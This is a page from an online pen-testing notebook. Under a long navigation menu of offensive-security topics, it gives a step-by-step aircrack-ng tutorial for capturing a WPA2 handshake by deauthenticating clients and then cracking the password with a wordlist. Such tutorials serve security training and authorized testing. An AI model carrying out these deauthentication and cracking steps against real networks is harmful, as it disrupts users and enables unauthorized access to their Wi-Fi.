๐Ÿฆน
CYBERSECURITY BOOK
  • ๐Ÿ‘ฝCS && PEN-TESTING BOOK
    • ๐Ÿ”Reconnaissance
      • ๐ŸˆดPassive Recon
        • M365/Azure Tenant Recon
          • MSFTRecon
        • ๐Ÿ•ต๏ธOSINT
          • Data Breach and Leaks Resources
          • OSINT Tools and Resources
          • Shodan
          • Creepy
          • The US Army manual ATP 2-22.9
          • NATO OSINT manual
          • Twitter Geolocation
          • Geotagging: GeoSocial Footprint
          • Bitcoin Address Lookup
          • Google Docs OSINT
          • Monitoring Tools
          • TOR Onion Links
          • Phone Numbers
          • Mitaka - In-Browser Tool
          • Russian Target
          • FTP Servers
          • War Related
        • ๐ŸŽŸ๏ธADINT
          • Surveillance
        • ๐Ÿ—บ๏ธGEOINT
          • Methodology
          • SunCalc - Geospatial OSINT using shadows
        • โ˜ข๏ธSIGINT
          • Methodology
          • Wifi
            • Kismet
        • โ›“๏ธDNS Recon and Route Mapping
        • ๐Ÿ‘จโ€๐Ÿ’ผObtain User Information
        • ๐Ÿ•ธ๏ธWeb Recon
        • ๐Ÿ•ท๏ธScraping Crypto Addresses
        • File Sharing Services
      • โ˜ข๏ธActive Recon
        • ๐ŸนStealth Scanning Strategies
        • ๐ŸญIdentify Network Infrastructure
        • ๐Ÿ’ปHost Enumeration
        • โ›ท๏ธSparta
        • ๐ŸงฉFuzzing
          • โ„๏ธWfuzz
          • Fuzzing Applications
          • Linux Kernel Fuzzing
          • Fuzzing Chrome V8 Engine
      • โ˜ฆ๏ธDoxing
        • Doxing Anyone
        • Gmail Address
      • ๐ŸŽฅSurveillance
        • Location Tracking Techniques
    • ๐Ÿ”ขEnumeration
      • ๐Ÿ”…Protocols and Ports
        • 21 - FTP
        • 22 - SSH
        • 23 - Telnet
        • 25, 465 - SMTP
        • 110, 143 - POP3, IMAP4
        • 1521 - Oracle DB Server
        • 3306 - Mysql
        • 2375 - Docker
        • 8080, 50000 - Jenkins
        • 80, 443 - HTTP, HTTPS
        • 3389 - RDP
        • 5900 - VNC
        • 445 - SMB
        • 161 UDP - SNMP
        • 11211 - Memcached
        • 2049 - NFS
      • ๐ŸงLinux - POST
      • ๐ŸชŸWindows - POST
      • ๐Ÿ•ธ๏ธWeb Apps
        • Directory Enumeration
        • Identify Virtual Websites
    • โ˜ฎ๏ธPublic Exploits
      • Look for Public Exploits
      • Metasploit
    • ๐Ÿ•ŽVulnerability Scanning
      • โš›๏ธNuclei
      • โ›ตTsunami Security Scanner
    • ๐Ÿ•ณ๏ธTunneling & Exfiltration
      • SSH Tunneling
      • ICMP Exfiltration
      • DNS Exfiltration
      • DNS Tunneling
      • TCP/UDP Tunneling
      • CloudFlare Tunnel
      • SOCKS
      • Ngrok - Port Forwarding
      • CURL - Exfiltration
      • Rclone - Data Exfiltration
      • Data Bouncing - External Data Exfiltration
    • Backdoors
      • Asymmetric Backdoor
    • ๐ŸŽฃPivoting (Post Exploitation)
      • Using Metasploit
      • SOCKS, SSH - Pivoting
      • Remote Port Forwarding
      • Tool - Chisel
      • Chisel - Double Pivoting
      • Bypassing Firewall with Forward Relays
      • Reverse Relays - Metasploit
    • ๐ŸŽฏActive Directory Pentesting
      • ๐Ÿ”‘Crendentials
        • Group Policy Preferences
        • LLMNR Poisoning
        • LDAP (Post)
        • Brute Force
        • LAPS Toolkit
        • PFX File
      • ๐Ÿ•โ€๐ŸฆบKerberos Attacks
        • ASREProast
        • Kerberoast
        • Pass the Certificate
      • ๐ŸAD Post Exploitation
        • Active Directory Post Exploitation
      • โ„น๏ธIntroduction to Identities
      • ๐Ÿ”งTesting Active Directory
      • ๐ŸŽ“Advanced Penetration Testing
      • ๐Ÿ”งAutomated Tools
        • ADCS Exploitation Tool
      • Hacking Active Directory Environment
        • ๐Ÿ•ต๏ธEnumeration
        • ๐ŸฆธExploitation
        • ๐ŸšชPrivilege Escalation
      • Windows and Active Directory Attacks
        • Shared Local Administrator Password
        • NTLM/SMB Relay
    • ๐ŸณDocker
      • Docker Container
      • Expose Docker Remotely
    • โ˜ธ๏ธKubernetes
      • Basic Commands
    • ๐Ÿ™…โ€โ™‚๏ธSocial Engineering
      • ๐Ÿ—บ๏ธLocation Phishing
      • ๐Ÿง˜โ€โ™‚๏ธ0-Click Email Attack
      • ๐ŸงBinary Linux Trojan
      • ๐Ÿ“งPhishing Mail
      • ๐Ÿ“Malicious File
      • โ™‰Malicious USB Drive
      • ๐Ÿ“ฉSpear-Phishing Methods (VIP)
      • ๐Ÿง‘โ€๐Ÿ’ผInsider Attack
      • Wifi Phishing - Wifiphisher
      • ๐Ÿ”MFA Bypass
      • Link Attacks
      • ๐Ÿ“‹Clipboard Hijacking (Post)
      • Copy-Paste Spoofing
    • ๐Ÿ—บ๏ธCEH Mindmaps
      • โ„น๏ธRecon and Information Gathering
        • Lab 1: Perform Footprinting Through Search Engines
          • Task 1: Gather Information using Advanced Google Hacking Techniques
          • Task 2: Gather Information from Video Search Engines
          • Task 3: Gather Information from FTP Search Engines
          • Task 4: Gather Information from IoT Search Engines
        • Lab 2: Perform Footprinting Through Web Services
          • Task 1: Find the Company's Domains and Sub-domains using Netcraft
          • Task 2: Gather Personal Information using PeekYou Online People Search Service
          • Task 3: Gather an Email List using theHarvester
          • Task 4: Gather Information using Deep and Dark Web Searching
          • Task 5: Determine Target OS Through Passive Footprinting
        • Lab 3: Perform Footprinting Through Social Networking Sites
          • Task 1: Gather Employee's Information from LinkedIn using theHarvester
          • Task 2: Gather Personal Information from Various Social Networking Sites using Sherlock
          • Task3: Gather Information using Followerwonk
        • Lab 4: Perform Website Footprinting
          • Task 1: Gather Information About a Target Website using Ping Command Line Utility
          • Task 2: Gather Information About a Target Website using Photon
          • Task 3: Gather Information About a Target Website using Central Ops
          • Task 4: Extract a Company's Data using Web Data Extractor
          • Task 5: Mirror a Target Website using HTTrack Web Site Copier
          • Task 6: Gather Information About a Target Website using GRecon
          • Task 7: Gather a Wordlist from the Target Website using CeWL
        • Lab 5: Perform Email Footprinting
          • Task 1: Gather Information about a Target by Tracing Emails using eMailTrackerPro
        • Lab 6: Perform Whois Footprinting
          • Task 1: Perform Whois Lookup using DomainTools
        • Lab 7: Perform DNS Footprinting
          • Task 1: Gather DNS Information using nslookup Command Line Utility and Online
          • Task 2: Perform Reverse DNS Lookup using Reverse IP Domain Check and DNSRecon
          • Task 3: Gather Information of Subdomain and DNS Records using SecurityTrails
        • Lab 8: Perform Network Footprinting
          • Task 1: Locate Network Range
          • Task 2: Perform Network Tracerouting in Windows and Linux Machines
          • Task 3: Perform Advanced Network Route Tracing Using Path Analyzer Pro
        • Lab 9: Perform Footprinting using Various Footprinting Tools
          • Task 1: Footprinting a Target using Recon-ng
          • Task 2: Footprinting a Target using Maltego
          • Task 3: Footprinting a Target using OSRFramework
          • Task 4: Footprinting a Target using FOCA
          • Task 5: Footprinting a Target using BillCipher
          • Task 6: Footprint a Target using OSNIT Framework
      • ๐Ÿ”„Network Scanning
        • Tasks
      • ๐Ÿ”ขEnumeration
        • Tasks
      • ๐Ÿ‘จโ€๐Ÿ”งVulnerability Analysis
        • Tasks
      • ๐ŸฆธSystem Hacking
        • Tasks
      • *๏ธMalware Analysis
        • Tasks
      • โ„๏ธSniffing
        • Tasks
      • ๐Ÿง‘โ€๐Ÿคโ€๐Ÿง‘Social Engineering
        • Tasks
      • ๐ŸšซDenial of Service
        • Tasks
      • ๐Ÿ›ฉ๏ธSession Hijacking
        • Tasks
      • ๐Ÿ†”Evading IDS, Firewalls, and Honeypots
        • Tasks
      • ๐Ÿ–ฅ๏ธWeb Server Hacking
        • Tasks
      • ๐Ÿ•ธ๏ธWeb Application Hacking
        • Tasks
      • ๐Ÿ’‰SQL Injection
        • Tasks
      • ๐Ÿ‘๏ธโ€๐Ÿ—จ๏ธWireless Network Hacking
        • Tasks
      • ๐Ÿ“ฑMobile Hacking
        • Tasks
      • ๐Ÿ‘จโ€๐Ÿ”ฌIoT and OT Hacking
        • Tasks
      • โ˜๏ธCloud Computing
        • Tasks
      • ๐Ÿ”Cryptography
        • Tasks
    • ๐Ÿ—พCND Mindmaps
    • ๐Ÿ‘ฟVulnerability Research
      • ๐Ÿ‘จโ€๐Ÿ’ปCode Review
    • ๐Ÿ“ถNetwork Security
      • ๐ŸฆInstalling and Configuring Network Based IDS In Ubuntu: Suricata
      • ๐Ÿ›๏ธOpenSSL
      • ๐Ÿ‘ฉโ€๐Ÿš’Active Directory
        • LAPS
    • ๐Ÿ›‚Port Forwarding
      • ๐ŸงLinux
      • ๐ŸชŸWindows
      • ๐Ÿ”„Router
    • ๐Ÿ‘พAPI Testing
      • Reverse Engineering
        • Reverse Engineer an API using MITMWEB and POSTMAN
      • API Hacking Basics
        • Practicals
      • ๐Ÿ•ต๏ธโ€โ™‚๏ธAPI Recon
      • ๐Ÿ“„API Documentation
        • โš—๏ธLab: Exploiting an API endpoint using documentation
      • ๐Ÿ‘จโ€๐ŸŽคIdentifying and Interacting with API Endpoint
        • โš—๏ธLab: Finding and exploiting an unused API endpoint
      • ๐ŸฆฎFinding Hidden Parameters
      • ๐ŸทMass assignment vulnerabilities
        • โš—๏ธLab: Exploiting a mass assignment vulnerability
      • โœ…Preventing vulnerabilities in APIs
      • ๐Ÿ˜ทServer-side parameter pollution
      • ๐Ÿ•ต๏ธโ€โ™‚๏ธTesting for server-side parameter pollution in the query string
        • โš—๏ธLab: Exploiting server-side parameter pollution in a query string
      • ๐Ÿ›ฃ๏ธTesting for server-side parameter pollution in REST paths
      • ๐ŸšงTesting for server-side parameter pollution in structured data formats
        • โš—๏ธLab: Exploiting server-side parameter pollution in a REST URL
      • ๐Ÿ‘จโ€๐Ÿš€Testing with automated tools
      • ๐ŸšจPreventing server-side parameter pollution
    • ๐Ÿ•ธ๏ธWeb App Pentesting Notes
      • ๐ŸงฐWeb App Pentesting Tools
        • Fuzzing: ffuf Tool
        • Nosql Injection: NoSqlMap
        • Kiterunner
        • Burp Suite
      • โŒXSS and XSRF Together
      • ๐Ÿ’‰NoSQL Injection
        • NoSQL Databases
        • NoSQL syntax injection
        • NoSQL operator injection
        • Exploit Syntax Injection to Extract Data
        • Exploiting NoSQL operator injection to extract data
        • Timing based injection
        • Preventing NoSQL injection
      • ๐Ÿง™Cross Site Request Forgery
      • ๐Ÿ“ผHidden Parameter Discovery
      • ๐Ÿ“ŒSSTI : Server Side Template Injection
        • Lab: Basic server-side template injection
        • Lab: Basic server-side template injection (code context)
        • Lab: Server-side template injection using documentation
        • Lab: Server-side template injection in an unknown language with a documented exploit
        • Lab: Server-side template injection with information disclosure via user-supplied objects
      • ๐Ÿ’ŽJWT Attack
        • Exploiting flawed JWT signature verification
        • Brute-forcing secret keys
        • JWT header parameter injections
        • Prevent JWT attacks
      • ๐Ÿ“ŠGraphQL API Vulnerabilities
        • Exploiting Unsanitized Arguments
        • Discovering Schema Information
          • Lab: Accessing private GraphQL posts
          • Lab: Accidental exposure of private GraphQL fields
        • Bypassing GraphQL introspection defenses
          • Lab: Finding a hidden GraphQL endpoint
        • Bypassing rate limiting using aliases
          • Lab: Bypassing GraphQL brute force protections
        • GraphQL CSRF
          • Lab: Performing CSRF exploits over GraphQL
      • ๐Ÿ”Authentication Vulnerabilities
      • ๐Ÿ‡Race Conditions
        • Limit overrun race conditions
        • Multi Endpoint Race Conditions
        • Single Endpoint Race Conditions
        • Time Sensitive Attacks
      • ๐Ÿง LLM Attacks
        • Exploiting LLM APIs, functions, and plugins
        • Indirect Prompt Injection
      • โ˜ธ๏ธHost Header Attacks
        • Testing for Vulnerability
        • Password Reset Poisoning
        • Web Cache Poisoning
        • Accessing Restricted Functionality
    • ๐Ÿ›ฉ๏ธWireless Hacking
      • Zigbee Attacks
      • Wifi Attacks
        • Hack WPA2 Networks
        • Automated: Wifite
      • Bluetooth Attacks
        • BlueDucky Script
      • RFID Attacks
    • ๐ŸCEH Engage Walkthroughs
      • 1๏ธโƒฃCEH Engage Part 1
      • 2๏ธโƒฃCEH Engage Part 2
      • 3๏ธโƒฃCEH Engage Part 3
      • 4๏ธโƒฃCEH Engage Part 4
    • ๐ŸŽƒEvasion
      • OWASP-ZSC
      • AMSI Bypass
      • Windows Evasion
    • ๐ŸšชPost exploitation
      • ๐Ÿ›ฌLiving Off The Land Tools
      • ๐ŸฅMimikatz
      • ๐ŸงPrivilege escalation: Linux
      • ๐ŸชŸPrivilege escalation: Windows
      • ๐Ÿ‘พPAC Tempering
      • Amnesiac - EDR Bypass
    • ๐Ÿ”“Hashing & Password Cracking
      • Hashing
      • Custom Wordlist
      • Hydra
      • John
      • Windows - Local Password Cracking
      • Password Cracking using Rules
    • ๐Ÿ“’Hacking Cheat Sheets
      • ๐Ÿ”Recon Cheatsheet
      • ๐Ÿ”ขEnumeration Cheatsheet
      • ๐ŸšShells and Reverse Shells Cheat Sheet
      • ๐ŸฎMeterpreter Cheat Sheet
      • โ˜„๏ธPowershell Commands Cheat Sheet
      • ๐Ÿ’‰Command Injection Cheat Sheet
      • ๐ŸชกSQL Injection Cheat Sheet
      • ๐ŸฎMetasploit Cheat Sheet
      • ๐ŸงฐEthical Hacking Tools
      • ๐ŸงLinux Hacking Basics
      • ๐Ÿ”บMSFVenom
    • ๐Ÿ‡CEH Practical
      • CEH Practical Tools
      • ๐Ÿ”Network Scanning
      • ๐Ÿ•โ€๐ŸฆบService Enumeration
      • ๐Ÿ–Š๏ธStegnography
      • ๐Ÿ”“Cryptography
      • ๐Ÿ•ธ๏ธWeb and Android Hacking
      • ๐ŸšชPrivilege Escalation
      • ๐Ÿฆ„Malware Threats
    • โ˜๏ธCloud Pentesting
      • โœ๏ธAWS Pentesting
        • ๐ŸŒ†AWS Environments
          • Identity and Access Management
          • Identity Based Policies
          • Resource Based Policy
          • Untitled
        • ๐ŸงฐTools
          • AWS CLI
          • Pacu
          • Prowler
          • Cloudsplaining
        • Attacks & Methodology
          • ๐Ÿ‘จโ€๐Ÿ”ฌExploiting AWS Misconfigurations
          • AWS Pentest Methodology
        • Initial Access
          • Public Access
          • Leaked Secrets
          • Phishing
          • Resource Exploitation
        • Post-Compromise Recon
          • AWS Command Line
          • Resource Enumeration
          • IAM Policy Enumeration
          • Identifying Public Resources
        • S3 Buckets
          • S3 Bucket Misconfiguration
      • ๐Ÿ…ฐ๏ธAzure Pentesting
        • Azure Attack Matrix
        • Stealing Access Tokens
        • Lateral Movement - Skeleton Key Attack
    • ๐ŸชŸWindows Security
      • ๐Ÿ•ต๏ธโ€โ™‚๏ธRecon
        • Host Discovery
        • SMB
        • MSSQL
        • IIS
      • ๐ŸฆนExploitation
        • CMD Commands
      • ๐ŸšชPost Exploitation
        • Dump Password Hashes
        • Mimikatz
      • ๐Ÿฆ•Persistence (Post)
        • User Accounts, Hash Cracking, RID Hijacking
        • Backdoors
        • Services
        • Scheduled Tasks
        • Windows Startup
    • ๐ŸงLinux Security
      • ๐Ÿ‹๏ธโ€โ™‚๏ธPrivilege Escalation
        • 1๏ธโƒฃ1โƒฃ 1โƒฃ Exploiting Setuid Programs
        • 2๏ธโƒฃ2โƒฃ 2โƒฃ Cron Jobs
        • 3๏ธโƒฃ3โƒฃ 3โƒฃ Permissions
        • 4๏ธโƒฃ4โƒฃ 4โƒฃ Logs
        • 5๏ธโƒฃ5โƒฃ 5โƒฃ Restricted Shell
      • Persistence
        • D3m0n1z3dShell
    • ๐ŸŽMacOS Security
      • Endpoint Security
        • eslogger
    • ๐Ÿ“ฑAndroid Security
      • Android Pentesting Notes
      • Android Application Pentesting Part 1
        • Static Analysis
        • Dynamic Analysis
      • Android Application Pentesting Part 2
        • Aspects of Android Security
        • Static Application Testing
        • Dynamic Application Testing - Part 1
        • Platform Interaction Testing
        • Dynamic Application Testing - Part 2
        • OWASP Top 10
      • Mobile Application Pentesting Part 3
        • Mobile Security Controls
        • Dynamic Analysis
        • Static Code Analysis
        • Insecure Data Storage
        • Runtime Security
    • ๐ŸŽiOS Security
      • iOS Application Analysis
    • ๐ŸงพScripting
      • ๐Ÿ’ŽRuby
        • Basics
        • Object Types
      • ๐ŸPython
        • Web Scrapping Scripts
      • ๐ŸงBash
      • ๐ŸชPerl
      • ๐Ÿ˜PHP
    • ๐Ÿ‰Reverse Engineering & Malware Analysis
      • RE Preparation
        • RE Process
        • Malware Analysis Tools
        • Malware Components: Windows
      • Shellcode Analysis
        • Automated Extraction
      • 1๏ธโƒฃDisassembly and Disassembler
      • 2๏ธโƒฃBinary Analysis
      • ๐ŸงLinux ELF Format
      • โ™ŽYara Guide
      • ๐Ÿ“ฑAndroid Reverse Engineering
        • Spyware Reverse Engineering
      • ๐Ÿ“ฒMobile Applications
        • Flutter Mobile Apps
    • ๐ŸŒ Protocol Exploitation
      • ARP
      • DNS
      • VoIP
    • ๐Ÿ›œNetwork Pentesting
      • SNMP - Authentification
    • ๐Ÿ‘ฎDigital Forensics & Incident Response
      • ๐Ÿ“ฉEmail Forensics
        • Callback Phishing
        • Business Email Compromise Investigations
          • Investigating using Hawk
          • Microsoft Defender Explorer
      • ๐Ÿ’ธRansomware Forensics
        • Decrypting Intermittent Encryption
      • ๐Ÿ’ฑBlockchain Forensics
        • ๐ŸพFrontrunning/Sandwich Bot Finder
      • ๐Ÿ“Memory Forensics
        • Process
        • Memory Analysis - Volatility3
      • โ˜„๏ธNetwork Forensics
        • Pcap Analysis
      • ๐ŸชŸWindows Forensics
        • NTDS Secret Extraction
        • Detecting Hidden Processes
        • Analyzing Prefetch Files
        • Windows MFT Parsing
        • USN Journal Forensics
      • ๐Ÿ“ผMedia Forensics
        • Rubber Ducky Analysis
        • RDP Bitmap Cache
        • USB Event Tracking
      • ๐Ÿง™Forensic Imaging
        • Image Analysis: Autopsy
      • ๐Ÿช…Data Collection
        • ๐ŸชŸWindows
        • ๐ŸงUnix/Linux
      • ๐Ÿ”Privacy Research
        • Deanonymization - TOR Hidden Services
        • Deanonymization - Flash Code
        • Dark Web - OSINT
        • Dark Web Investigation
      • ๐Ÿ•ธ๏ธWeb Investigations
        • Investigating Favicon Hashes
      • ๐Ÿดโ€โ˜ ๏ธThreat Detection
        • Reading Clipboard Data via Powershell
        • Detection of Windows Defender Tampering via Powershell
        • Detection of Remote Template Injection
    • ๐Ÿฆ‹Cisco Attacks
      • Decrypting Type 5 Cisco Passwords
    • ๐ŸผCVE's
      • libssh 0.8.1 - CVE 2018-10933
      • proftpd-1.3.3c-backdoor
      • zerologon - CVE-2020-1472
      • Apache Ghostcat - CVE 2020-1938
      • Spring Authorization Bypass - CVE 2024-38821
      • Apache Solr - CVE-2024-45216
      • Bypassing Mark of the Web with 7zip CVE-2025-0411
    • ๐Ÿ›OWASP TOP 10
      • ๐Ÿ•ธ๏ธWEB
        • 1๏ธโƒฃA01:2021 โ€“ Broken Access Control
        • 2๏ธโƒฃA02:2021 โ€“ Cryptographic Failures
        • 3๏ธโƒฃA03:2021 โ€“ Injection
        • 4๏ธโƒฃA04:2021 โ€“ Insecure Design
        • 5๏ธโƒฃA05:2021 โ€“ Security Misconfiguration
        • 6๏ธโƒฃA06:2021 โ€“ Vulnerable and Outdated Components
        • 7๏ธโƒฃA07:2021 โ€“ Identification and Authentication Failures
        • 8๏ธโƒฃA08:2021 โ€“ Software and Data Integrity Failures
        • 9๏ธโƒฃA09:2021 โ€“ Security Logging and Monitoring Failures
        • ๐Ÿ”ŸA10:2021 โ€“ Server-Side Request Forgery (SSRF)
      • ๐Ÿฆ„API
      • ๐ŸŒ†IoT
      • ๐Ÿ“ฑMOBILE
    • ๐Ÿ›ผWeb 3 Vulnerabilities
      • Fuzzing Ethereum Smart Contract
      • Static Analysis using Slither
      • Solidity Audit using Mythril
      • ๐ŸŽ†Reentrancy Vulnerabilities
      • ๐ŸฅชSandwich Attacks
      • ๐ŸŒ‡Integer Attacks
      • ๐Ÿš‚Authorization Issues
      • ๐ŸŒ‰Bad Randomness
    • ๐Ÿ›ฉ๏ธWeb 3 Smart Contract
      • โ›ŽBlockchain Hacking (Python)
        • ๐ŸŒ†Smart Contract Template
        • ๐ŸŽ†Interact with ERC20 Tokens
        • ๐Ÿ“ฒInteract with Wallets
        • ๐ŸทReverse Engineering Bytecode
        • โœ’๏ธSign Transactions
        • ๐ŸชขSmart Contract Interactions
        • ๐Ÿงœโ€โ™€๏ธSubscribing to Events
        • ๐ŸŸคBrownie Interactions
        • ๐Ÿ‘พExploit PoC
    • ๐ŸŒƒSmart Contract Audits
      • ๐ŸธThunder Loan Audit
        • 1๏ธโƒฃInitial Review
    • ๐Ÿ‘ฉโ€๐Ÿ’ผGRC Frameworks
      • NIST 800-39
      • SOC 2
      • HIPAA
      • PCI-DSS
      • NIST CSF
      • FedRAMP
      • CSA STAR
      • SOX
      • GDPR
      • ISO 27001
  • ๐ŸฆนREAL WORLD && CTF
    • โš›๏ธScripts and Systems
      • R: Code Execution
      • Python2 Input Vulnerability
  • ๐ŸฆธMISCELLANEOUS
    • Decrypt SSL Traffic
    • ๐ŸฆOpenSSL Commands
    • ๐Ÿ”’GPG
    • ๐Ÿ”SSH Commands
    • OWASP BWAPP Setup
    • Commando VM Setup
    • Living Off The Land Applications
    • ๐ŸงDevelop Your Own Linux Distro
    • ๐ŸฑGitHub Commands
      • ๐Ÿ“”Cheatsheet
  • ๐Ÿง›โ€โ™‚๏ธADVANCED PERSISTENT THREATS - RESEARCH
    • Reconnaissance
    • Resource Development
    • Initial Compromise
    • Execution
    • Establish persistence
    • Escalate privileges
    • Defense Evasion
    • Credential Access
    • Discovery
    • Lateral movement
    • Collection
    • Command and Control
    • Data exfiltration
    • Impact
  • ๐Ÿ‘พTHREAT HUNTING - RESEARCH
    • MacOS
    • Azure Sentinel
    • Network Data
      • Network Data Sources
      • Network Threat Hunting Too
      • Hunting the Undetected
      • Protocols
      • Network Threat Hunts
    • Active Directory
      • Introduction
      • Threat Hunting
      • Threat Hunting in Active Directory
    • Data Collection
      • Internal Data
      • External Data
        • Private Data Sources
        • Community Data Sources
        • Public Data Sources
      • OSINT
    • Data Management and Processing
      • Data Processing
      • Common CTI Standards
      • Storage and Integration
      • Threat Intelligence Platforms
    • Analysis
      • Introduction
      • Analysis of Competing Hypothesis
      • Cyber Kill Chain and Diamond Model
      • Cyber Kill Chain and Courses of Action
    • Campaign Analysis
      • Introduction
      • Heatmap Analysis
      • Visual Analysis
      • MITRE Threat Group Tracker
      • Threat Intelligence Naming Conventions
    • Attribution
      • Introduction
      • Cognitive Biases
      • Logical Fallacies
      • Manage Biases
      • Nation-State Attribution
    • Dissemination and Sharing
      • Introduction
      • Tactical Intelligence
      • Operational Intelligence
      • Strategic Intelligence
  • ๐Ÿฆ…CISA - INCIDENT RESPONSE PLAYBOOK
    • Overview
Powered by GitBook
On this page
  • Install Aircrak-ng In Your Machine
  • Put the Network Interface Card in Monitor Mode
  • Identify the Wireless Network Card
  • Run The Below Commands
  • Look For Targets
  • Scan A Specific Target
  • Capture the Handshake
  • Performing DoS on the AP
  • 1. Setup airodump-ng to capture packets and save them
  • 2. Run the De-Authentication Attack
  • 3. Capture the Handshake
  • Cracking the Captured Password
  • END: Put Your Network Card In Managed Mode

Was this helpful?

Edit on GitHub
  1. CS && PEN-TESTING BOOK
  2. Wireless Hacking
  3. Wifi Attacks

Hack WPA2 Networks

Install Aircrak-ng In Your Machine

sudo apt install aircrack-ng

Put the Network Interface Card in Monitor Mode

Identify the Wireless Network Card

iwconfig

Run The Below Commands

sudo airmon-ng check rfkillsudo
airmon-ng start <network interface>

Look For Targets

sudo airodump-ng <network interface>

Scan A Specific Target

sudo airodump-ng <network interface> --bssid <AP>

Capture the Handshake

Performing DoS on the AP

You can use aireplay-ng or mdk4 to disconnect devices from APs for a time. This is called a de-authentication attack or a wireless DOS (Denial-Of-Service) attack.

Now hereโ€™s the game plan:

  1. Setup airodump-ng to capture packets and save them

  2. De-authenticate the device for some time while airodump-ng is running

  3. Capture the handshake

1. Setup airodump-ng to capture packets and save them

sudo airodump-ng -c <channel number> --bssid <AP BSSID> <network interface> -w <path for saved packets file>

Here, we're using the -c flag to specify the channel to search, the --bssid flag for the MAC address of the AP, and the -w flag to give a path you want to save the captured packets to.

Quick lesson: Channels reduce the chances of APs interfering with each other. When running airodump-ng, you can identify the channel number under the CH column.

2. Run the De-Authentication Attack

sudo aireplay-ng -a <BSSID of the AP> --deauth <time> <network interface>

The -a flag specifies the MAC address of the AP, --deauth specifies how long you want the attack to run in seconds, followed up by the network card.

3. Capture the Handshake

While the DOS attack is underway, check on your airodump scan. You should see at the right top : WPA handshake: <mac address>. Once you have verified that, you can stop the replay attack and the airodump-ng scan.

Cracking the Captured Password

A PMK is basically an algorithmic combination of a word and the APs name. Our intention is to continuously generate PMKs using a wordlist against the handshake. If the PMK is valid, the word used to generate it is the password. If the PMK is not valid, it skips to the next word on the list.

sudo aircrack-ng <captured file with .cap> -w <path to wordlist>

END: Put Your Network Card In Managed Mode

To clean up, simply remove the file captures, close your terminals, and run the command service NetworkManager restart to change your network card back to managed mode so you can connect to the Wi-Fi.

PreviousWifi AttacksNextAutomated: Wifite

Last updated 6 months ago

Was this helpful?

๐Ÿ‘ฝ
๐Ÿ›ฉ๏ธ